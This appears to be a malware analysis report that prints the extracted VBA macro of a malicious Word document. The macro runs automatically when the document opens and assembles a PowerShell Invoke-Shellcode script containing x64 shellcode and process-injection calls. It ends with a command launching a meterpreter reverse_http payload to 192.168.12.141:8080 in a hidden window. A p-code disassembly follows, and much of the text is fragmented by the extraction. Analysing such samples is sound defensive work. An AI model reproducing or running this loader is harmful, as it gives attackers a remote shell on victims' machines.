CJikXH = CJikXH + " 0xbb,0xe0,0x1d,0x2a,0x0a,0x"
CJikXH = CJikXH + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
CJikXH = CJikXH + "0a,"
0x80,0xfb,0"
CJikXH = CJikXH + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
CJikXH = CJikXH + "x53,0xff,0xd5,0x63,"
"
CJikXH = CJikXH + " 0x61,0x6c,0x63,0x00)"
[Byte[]] $Shell"
CJikXH = CJikXH + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
CJikXH = CJikXH + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
"
CJikXH = CJikXH + " 0x56,0x48,0x31,0xd2,0x6"
CJikXH = CJikXH + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
CJikXH = CJikXH + "b,0x52,"
0x20,0x"
CJikXH = CJikXH + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
CJikXH = CJikXH + "31,0xc9,0x48,0x31,0xc0,"
"
CJikXH = CJikXH + " 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
CJikXH = CJikXH + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
"
CJikXH = CJikXH + " 0x52,0x41,0x51,0x48,0x8b,"
CJikXH = CJikXH + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
CJikXH = CJikXH + "0x88,"
0x00,0x00"
CJikXH = CJikXH + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
CJikXH = CJikXH + ",0x8b,0x48,0x18,0x44,"
"
CJikXH = CJikXH + " 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
CJikXH = CJikXH + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
"
CJikXH = CJikXH + " 0x01,0xd6,0x4d,0x31,0xc9,0x"
CJikXH = CJikXH + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
CJikXH = CJikXH + "c1,"
0x38,0xe0,0"
CJikXH = CJikXH + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
CJikXH = CJikXH + "x75,0xd8,0x58,0x44,"
"
CJikXH = CJikXH + " 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
CJikXH = CJikXH + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
"
CJikXH = CJikXH + " 0x01,0xd0,0x41,0x8b,0x04,0x88"
CJikXH = CJikXH + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
CJikXH = CJikXH + ","
0x41,0x58,0x4"
CJikXH = CJikXH + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
CJikXH = CJikXH + "f,0xe0,0x58,0x41,"
"
CJikXH = CJikXH + " 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
CJikXH = CJikXH + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
"
CJikXH = CJikXH + " 0x00,0x00,0x00,0x00,0x00,0x48,0"
CJikXH = CJikXH + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
CJikXH = CJikXH + ""
0x6f,0x87,0xff,"
CJikXH = CJikXH + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
CJikXH = CJikXH + "0xbd,0x9d,0xff,"
"
CJikXH = CJikXH + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
CJikXH = CJikXH + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
"
CJikXH = CJikXH + " 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
CJikXH = CJikXH + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
"
CJikXH = CJikXH + " }"
if ( $PSBoundParameters['ProcessID'] )
"
CJikXH = CJikXH + " {"
$OpenProcessAddr = Get-ProcAddress "
CJikXH = CJikXH + "kernel32.dll OpenProcess"
$OpenProcessDele"
CJikXH = CJikXH + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
CJikXH = CJikXH + "2]) ([IntPtr])"
$OpenProcess = [System.Run"
CJikXH = CJikXH + "time.InteropServices.Marshal]::GetDelegateForFunct"
CJikXH = CJikXH + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
CJikXH = CJikXH + ""
$VirtualAllocExAddr = Get-ProcAddress ke"
CJikXH = CJikXH + "rnel32.dll VirtualAllocEx"
$VirtualAllocEx"
CJikXH = CJikXH + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
CJikXH = CJikXH + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
"
CJikXH = CJikXH + "$VirtualAllocEx = [System.Runtime.InteropServices."
CJikXH = CJikXH + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
CJikXH = CJikXH + "locExAddr, $VirtualAllocExDelegate)"
$Writ"
CJikXH = CJikXH + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
CJikXH = CJikXH + "WriteProcessMemory"
$WriteProcessMemoryDel"
CJikXH = CJikXH + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
CJikXH = CJikXH + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
CJikXH = CJikXH + ")"
$WriteProcessMemory = [System.Runtime.I"
CJikXH = CJikXH + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
CJikXH = CJikXH + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
CJikXH = CJikXH + "elegate)"
$CreateRemoteThreadAddr = Get-Pr"
CJikXH = CJikXH + "ocAddress kernel32.dll CreateRemoteThread"
"
CJikXH = CJikXH + " $CreateRemoteThreadDelegate = Get-DelegateType @("
CJikXH = CJikXH + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
CJikXH = CJikXH + "[UInt32], [IntPtr]) ([IntPtr])"
$CreateRem"
CJikXH = CJikXH + "oteThread = [System.Runtime.InteropServices.Marsha"
CJikXH = CJikXH + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
CJikXH = CJikXH + "eadAddr, $CreateRemoteThreadDelegate)"
$Cl"
CJikXH = CJikXH + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
CJikXH = CJikXH + "Handle"
$CloseHandleDelegate = Get-Delegat"
CJikXH = CJikXH + "eType @([IntPtr]) ([Bool])"
$CloseHandle ="
CJikXH = CJikXH + " [System.Runtime.InteropServices.Marshal]::GetDele"
CJikXH = CJikXH + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
CJikXH = CJikXH + "dleDelegate)"
if ( $Force -or $psCmdlet.Sh"
CJikXH = CJikXH + "ouldContinue( 'Do you wish to carry out your evil "
CJikXH = CJikXH + "plans?',"
"Injecting shellcode in"
CJikXH = CJikXH + "jecting into $((Get-Process -Id $ProcessId).Proces"
CJikXH = CJikXH + "sName) ($ProcessId)!" ) )
{
"
CJikXH = CJikXH + "Inject-RemoteShellcode $ProcessId"
}
"
CJikXH = CJikXH + "}"
Else
{
$VirtualAllocAddr = Ge"
CJikXH = CJikXH + "t-ProcAddress kernel32.dll VirtualAlloc"
$"
CJikXH = CJikXH + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
CJikXH = CJikXH + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
"
CJikXH = CJikXH + " $VirtualAlloc = [System.Runtime.InteropServices."
CJikXH = CJikXH + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
CJikXH = CJikXH + "locAddr, $VirtualAllocDelegate)"
$VirtualF"
CJikXH = CJikXH + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
CJikXH = CJikXH + ""
$VirtualFreeDelegate = Get-DelegateType "
CJikXH = CJikXH + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
"
CJikXH = CJikXH + "$VirtualFree = [System.Runtime.InteropServices.Mar"
CJikXH = CJikXH + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
CJikXH = CJikXH + "ddr, $VirtualFreeDelegate)"
$CreateThreadA"
CJikXH = CJikXH + "ddr = Get-ProcAddress kernel32.dll CreateThread"
"
CJikXH = CJikXH + " $CreateThreadDelegate = Get-DelegateType @("
CJikXH = CJikXH + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
CJikXH = CJikXH + "[IntPtr]) ([IntPtr])"
$CreateThread = [Sys"
CJikXH = CJikXH + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
CJikXH = CJikXH + "orFunctionPointer($CreateThreadAddr, $CreateThread"
CJikXH = CJikXH + "Delegate)"
$WaitForSingleObjectAddr = Get-"
CJikXH = CJikXH + "ProcAddress kernel32.dll WaitForSingleObject"
"
CJikXH = CJikXH + " $WaitForSingleObjectDelegate = Get-DelegateTyp"
CJikXH = CJikXH + "e @([IntPtr], [Int32]) ([Int])"
$WaitForSi"
CJikXH = CJikXH + "ngleObject = [System.Runtime.InteropServices.Marsh"
CJikXH = CJikXH + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
CJikXH = CJikXH + "bjectAddr, $WaitForSingleObjectDelegate)"
"
CJikXH = CJikXH + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
CJikXH = CJikXH + "wish to carry out your evil plans?',"
"
CJikXH = CJikXH + " "Injecting shellcode into the running PowerSh"
CJikXH = CJikXH + "ell process!" ) )
{
Inject-L"
CJikXH = CJikXH + "ocalShellcode"
}
}
}
Invoke-Shell"
CJikXH = CJikXH + "code -Payload windows/meterpreter/reverse_http -Lh"
CJikXH = CJikXH + "ost 192.168.12.141 -Lport 8080 -Force"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create CJikXH, Null, objConfig, intProcessID
End Function
' Processing file: /tmp/qstore_uuhn9p8y
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1127 bytes
' Macros/VBA/NewMacros - 57861 bytes
' Line #0:
' FuncDefn (Sub Auto_Open())
' Line #1:
' ArgsCall asTf 0x0000
' Line #2:
' EndSub
' Line #3:
' Line #4:
' FuncDefn (Sub AutoOpen())
' Line #5:
' ArgsCall asTf 0x0000
' Line #6:
' EndSub
' Line #7:
' Line #8:
' FuncDefn (Sub Document_Open())
' Line #9:
' ArgsCall asTf 0x0000
' Line #10:
' EndSub
' Line #11:
' Line #12:
' FuncDefn (Public Function asTf() As Variant)
' Line #13:
' Dim
' VarDefn CJikXH (As String)
' Line #14:
' LitStr 0x0019 "function Invoke-Shellcode"
' St CJikXH
' Line #15:
' Reparse 0x0001 "{"
' Line #16:
' Reparse 0x0015 "[CmdletBinding( Defa""
' Line #17:
' Ld CJikXH
' LitStr 0x0032 "ultParameterSetName = 'RunLocal', SupportsShouldPr"
' Add
' St CJikXH
' Line #18:
' Ld CJikXH
' LitStr 0x0030 "ocess = $True , ConfirmImpact = 'High')] Param ("
' Add
' St CJikXH
' Line #19:
' Reparse 0x0001 """
' Line #20:
' Ld CJikXH
' LitStr 0x001E " [ValidateNotNullOrEmpty()]"
' Add
' St CJikXH
' Line #21:
' ArgsCall [UInt16] 0x0000
' Line #22:
' Reparse 0x0005 " ""
' Line #23:
' Ld CJikXH
' LitStr 0x000B "$ProcessID,"
' Add
' St CJikXH
' Line #24:
' Reparse 0x0026 " [Parameter( ParameterSetName = 'R""
' Line #25:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.